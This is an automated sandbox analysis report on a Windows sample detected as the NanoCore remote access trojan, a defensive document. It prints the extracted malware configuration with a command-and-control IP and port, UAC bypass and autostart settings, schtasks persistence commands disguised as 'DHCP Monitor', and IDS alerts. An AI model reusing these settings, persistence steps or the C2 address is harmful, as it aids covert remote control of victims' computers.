Play interactive tour

Edit tour

Analysis Report SYT09009.exe

Overview

General Information

Sample Name:	SYT09009.exe
Analysis ID:	411310
MD5:	fbfddfc110fd9d3775674447316de3d8
SHA1:	250149eebd54c774175cef2a09344cf429ca6f57
SHA256:	b98a4c0f84e431cbff5477f1e1ddfe1a93ba56775148cfca7f061f9beca0e48f
Tags:	NanoCore
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Nanocore RAT

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Maps a DLL or memory area into another process

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

SYT09009.exe (PID: 4956 cmdline: 'C:\Users\user\Desktop\SYT09009.exe' MD5: FBFDDFC110FD9D3775674447316DE3D8)

MSBuild.exe (PID: 3332 cmdline: 'C:\Users\user\Desktop\SYT09009.exe' MD5: 88BBB7610152B48C2B3879473B17857E)

schtasks.exe (PID: 4320 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5840 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

MSBuild.exe (PID: 5868 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 4440 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

dhcpmon.exe (PID: 6140 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 88BBB7610152B48C2B3879473B17857E)

conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "2dd052c5-2546-4017-851f-7f690b3c", "Group": "Default", "Domain1": "185.222.57.171", "Domain2": "", "Port": 4445, "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d7a:$a: NanoCore 0x1d9f:$a: NanoCore 0x1df8:$a: NanoCore 0x11f95:$a: NanoCore 0x11fbb:$a: NanoCore 0x12017:$a: NanoCore 0x1ee6c:$a: NanoCore 0x1eec5:$a: NanoCore 0x1eef8:$a: NanoCore 0x1f124:$a: NanoCore 0x1f1a0:$a: NanoCore 0x1f7b9:$a: NanoCore 0x1f902:$a: NanoCore 0x1fdd6:$a: NanoCore 0x200bd:$a: NanoCore 0x200d4:$a: NanoCore 0x2345d:$a: NanoCore 0x24817:$a: NanoCore 0x24861:$a: NanoCore 0x254bb:$a: NanoCore 0x2aaa0:$a: NanoCore
00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Process Memory Space: MSBuild.exe PID: 3332	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x554a3:$a: NanoCore 0x554c8:$a: NanoCore 0x55604:$a: NanoCore 0xba891:$a: NanoCore 0x113435:$a: NanoCore 0x11345a:$a: NanoCore 0x113596:$a: NanoCore 0x1baabd:$a: NanoCore 0x1baafa:$a: NanoCore 0x1bab83:$a: NanoCore 0x1bff1b:$a: NanoCore 0x1bff3e:$a: NanoCore 0x1bff93:$a: NanoCore 0x1c53d6:$a: NanoCore 0x1c5414:$a: NanoCore 0x1c54a0:$a: NanoCore 0x1cfe3d:$a: NanoCore 0x1cfe61:$a: NanoCore 0x1cfeb9:$a: NanoCore 0x1d7ad5:$a: NanoCore 0x1d7b76:$a: NanoCore
Process Memory Space: SYT09009.exe PID: 4956	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x127cbb:$x1: NanoCore.ClientPluginHost 0x127d1c:$x2: IClientNetworkHost 0x12d121:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x13b093:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: SYT09009.exe PID: 4956	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: SYT09009.exe PID: 4956	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1277c0:$a: NanoCore 0x1277dc:$a: NanoCore 0x127937:$a: NanoCore 0x127946:$a: NanoCore 0x127c1f:$a: NanoCore 0x127c4b:$a: NanoCore 0x127cbb:$a: NanoCore 0x1376fd:$a: NanoCore 0x13770f:$a: NanoCore 0x13774b:$a: NanoCore 0x127867:$b: ClientPlugin 0x127990:$b: ClientPlugin 0x127c54:$b: ClientPlugin 0x127cc4:$b: ClientPlugin 0x137718:$b: ClientPlugin 0x137754:$b: ClientPlugin 0x127add:$c: ProjectData 0x13764a:$c: ProjectData 0x128c19:$d: DESCrypto 0x137fa8:$d: DESCrypto 0x132fa6:$e: KeepAlive
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SYT09009.exe.2450000.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.SYT09009.exe.2450000.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
0.2.SYT09009.exe.2450000.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.SYT09009.exe.2450000.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
1.3.MSBuild.exe.404c416.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
1.3.MSBuild.exe.404c416.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
1.3.MSBuild.exe.406646f.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3831:$x1: NanoCore.ClientPluginHost 0x386a:$x2: IClientNetworkHost
1.3.MSBuild.exe.406646f.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3831:$x2: NanoCore.ClientPluginHost 0x394c:$s4: PipeCreated 0x384b:$s5: IClientLoggingHost
1.3.MSBuild.exe.4060a41.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x6dd6:$x1: NanoCore.ClientPluginHost 0xd05f:$x1: NanoCore.ClientPluginHost 0x1766e:$x1: NanoCore.ClientPluginHost 0x21a99:$x1: NanoCore.ClientPluginHost 0x2ca76:$x1: NanoCore.ClientPluginHost 0x38818:$x1: NanoCore.ClientPluginHost 0x5d71c:$x1: NanoCore.ClientPluginHost 0x6cb5c:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xd098:$x2: IClientNetworkHost 0x177cb:$x2: IClientNetworkHost 0x21ad2:$x2: IClientNetworkHost 0x2ca90:$x2: IClientNetworkHost 0x38832:$x2: IClientNetworkHost 0x5d736:$x2: IClientNetworkHost 0x6cb99:$x2: IClientNetworkHost
1.3.MSBuild.exe.4060a41.0.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x6dd6:$x2: NanoCore.ClientPluginHost 0xd05f:$x2: NanoCore.ClientPluginHost 0x1766e:$x2: NanoCore.ClientPluginHost 0x21a99:$x2: NanoCore.ClientPluginHost 0x2ca76:$x2: NanoCore.ClientPluginHost 0x38818:$x2: NanoCore.ClientPluginHost 0x5d71c:$x2: NanoCore.ClientPluginHost 0x6cb5c:$x2: NanoCore.ClientPluginHost 0x185c4:$s3: PipeExists 0x1800:$s4: PipeCreated 0x6eb4:$s4: PipeCreated 0xd17a:$s4: PipeCreated 0x17864:$s4: PipeCreated 0x21be4:$s4: PipeCreated 0x2daab:$s4: PipeCreated 0x3a5c3:$s4: PipeCreated 0x60a59:$s4: PipeCreated 0x6ffaf:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost 0x6df0:$s5: IClientLoggingHost
1.3.MSBuild.exe.4060a41.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0x5a1c:$a: NanoCore 0x6dd6:$a: NanoCore 0x6e20:$a: NanoCore 0x7a7a:$a: NanoCore 0xd05f:$a: NanoCore 0xd0d9:$a: NanoCore 0x1766e:$a: NanoCore 0x17758:$a: NanoCore 0x185cf:$a: NanoCore 0x21779:$a: NanoCore 0x217da:$a: NanoCore
0.2.SYT09009.exe.2450000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.SYT09009.exe.2450000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.SYT09009.exe.2450000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.SYT09009.exe.2450000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
1.3.MSBuild.exe.406646f.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost 0x7631:$x1: NanoCore.ClientPluginHost 0x11c40:$x1: NanoCore.ClientPluginHost 0x1c06b:$x1: NanoCore.ClientPluginHost 0x27048:$x1: NanoCore.ClientPluginHost 0x32dea:$x1: NanoCore.ClientPluginHost 0x57cee:$x1: NanoCore.ClientPluginHost 0x6712e:$x1: NanoCore.ClientPluginHost 0x766a:$x2: IClientNetworkHost 0x11d9d:$x2: IClientNetworkHost 0x1c0a4:$x2: IClientNetworkHost 0x27062:$x2: IClientNetworkHost 0x32e04:$x2: IClientNetworkHost 0x57d08:$x2: IClientNetworkHost 0x6716b:$x2: IClientNetworkHost
1.3.MSBuild.exe.406646f.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x7631:$x2: NanoCore.ClientPluginHost 0x11c40:$x2: NanoCore.ClientPluginHost 0x1c06b:$x2: NanoCore.ClientPluginHost 0x27048:$x2: NanoCore.ClientPluginHost 0x32dea:$x2: NanoCore.ClientPluginHost 0x57cee:$x2: NanoCore.ClientPluginHost 0x6712e:$x2: NanoCore.ClientPluginHost 0x12b96:$s3: PipeExists 0x1486:$s4: PipeCreated 0x774c:$s4: PipeCreated 0x11e36:$s4: PipeCreated 0x1c1b6:$s4: PipeCreated 0x2807d:$s4: PipeCreated 0x34b95:$s4: PipeCreated 0x5b02b:$s4: PipeCreated 0x6a581:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost 0x764b:$s5: IClientLoggingHost 0x11c5a:$s5: IClientLoggingHost 0x1c085:$s5: IClientLoggingHost
1.3.MSBuild.exe.406646f.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x13a8:$a: NanoCore 0x13f2:$a: NanoCore 0x204c:$a: NanoCore 0x7631:$a: NanoCore 0x76ab:$a: NanoCore 0x11c40:$a: NanoCore 0x11d2a:$a: NanoCore 0x12ba1:$a: NanoCore 0x1bd4b:$a: NanoCore 0x1bdac:$a: NanoCore 0x1bdef:$a: NanoCore 0x1be2f:$a: NanoCore 0x1c06b:$a: NanoCore 0x1c10b:$a: NanoCore 0x1c8e3:$a: NanoCore 0x1ced6:$a: NanoCore 0x1d027:$a: NanoCore 0x1de81:$a: NanoCore 0x1e0e8:$a: NanoCore 0x1e0fd:$a: NanoCore 0x1e11c:$a: NanoCore
1.3.MSBuild.exe.404c416.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d0e:$x1: NanoCore.ClientPluginHost 0x1b401:$x1: NanoCore.ClientPluginHost 0x2168a:$x1: NanoCore.ClientPluginHost 0x2bc99:$x1: NanoCore.ClientPluginHost 0x360c4:$x1: NanoCore.ClientPluginHost 0x410a1:$x1: NanoCore.ClientPluginHost 0x4ce43:$x1: NanoCore.ClientPluginHost 0x71d47:$x1: NanoCore.ClientPluginHost 0x81187:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d47:$x2: IClientNetworkHost 0x216c3:$x2: IClientNetworkHost 0x2bdf6:$x2: IClientNetworkHost 0x360fd:$x2: IClientNetworkHost 0x410bb:$x2: IClientNetworkHost 0x4ce5d:$x2: IClientNetworkHost 0x71d61:$x2: IClientNetworkHost 0x811c4:$x2: IClientNetworkHost
1.3.MSBuild.exe.404c416.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x15d0e:$x2: NanoCore.ClientPluginHost 0x1b401:$x2: NanoCore.ClientPluginHost 0x2168a:$x2: NanoCore.ClientPluginHost 0x2bc99:$x2: NanoCore.ClientPluginHost 0x360c4:$x2: NanoCore.ClientPluginHost 0x410a1:$x2: NanoCore.ClientPluginHost 0x4ce43:$x2: NanoCore.ClientPluginHost 0x71d47:$x2: NanoCore.ClientPluginHost 0x81187:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0x2cbef:$s3: PipeExists 0xe576:$s4: PipeCreated 0x15e2b:$s4: PipeCreated 0x1b4df:$s4: PipeCreated 0x217a5:$s4: PipeCreated 0x2be8f:$s4: PipeCreated 0x3620f:$s4: PipeCreated 0x420d6:$s4: PipeCreated 0x4ebee:$s4: PipeCreated 0x75084:$s4: PipeCreated
1.3.MSBuild.exe.404c416.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a56:$a: NanoCore 0x15aaf:$a: NanoCore 0x15ae2:$a: NanoCore 0x15d0e:$a: NanoCore 0x15d8a:$a: NanoCore 0x163a3:$a: NanoCore 0x164ec:$a: NanoCore 0x169c0:$a: NanoCore 0x16ca7:$a: NanoCore 0x16cbe:$a: NanoCore 0x1a047:$a: NanoCore 0x1b401:$a: NanoCore 0x1b44b:$a: NanoCore 0x1c0a5:$a: NanoCore 0x2168a:$a: NanoCore 0x21704:$a: NanoCore 0x2bc99:$a: NanoCore 0x2bd83:$a: NanoCore
Click to see the 16 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 3332, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.SYT09009.exe.2450000.4.raw.unpack

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "2dd052c5-2546-4017-851f-7f690b3c", "Group": "Default", "Domain1": "185.222.57.171", "Domain2": "", "Port": 4445, "RunOnStartup": "Enable", "RequestElevation": "Enable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsg940D.tmp\qp16430yyukg.dll

ReversingLabs: Detection: 10%

Multi AV Scanner detection for submitted file

Show sources

Source: SYT09009.exe

ReversingLabs: Detection: 38%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE

Source: SYT09009.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: SYT09009.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: SYT09009.exe, 00000000.00000003.243744964.0000000002B40000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SYT09009.exe, 00000000.00000003.243744964.0000000002B40000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: f:\dd\vsproject\xmake\XMakeCommandLine\objr\i386\MSBuild.pdb source: dhcpmon.exe, dhcpmon.exe.1.dr
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49718 -> 185.222.57.171:4445
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49722 -> 185.222.57.171:4445
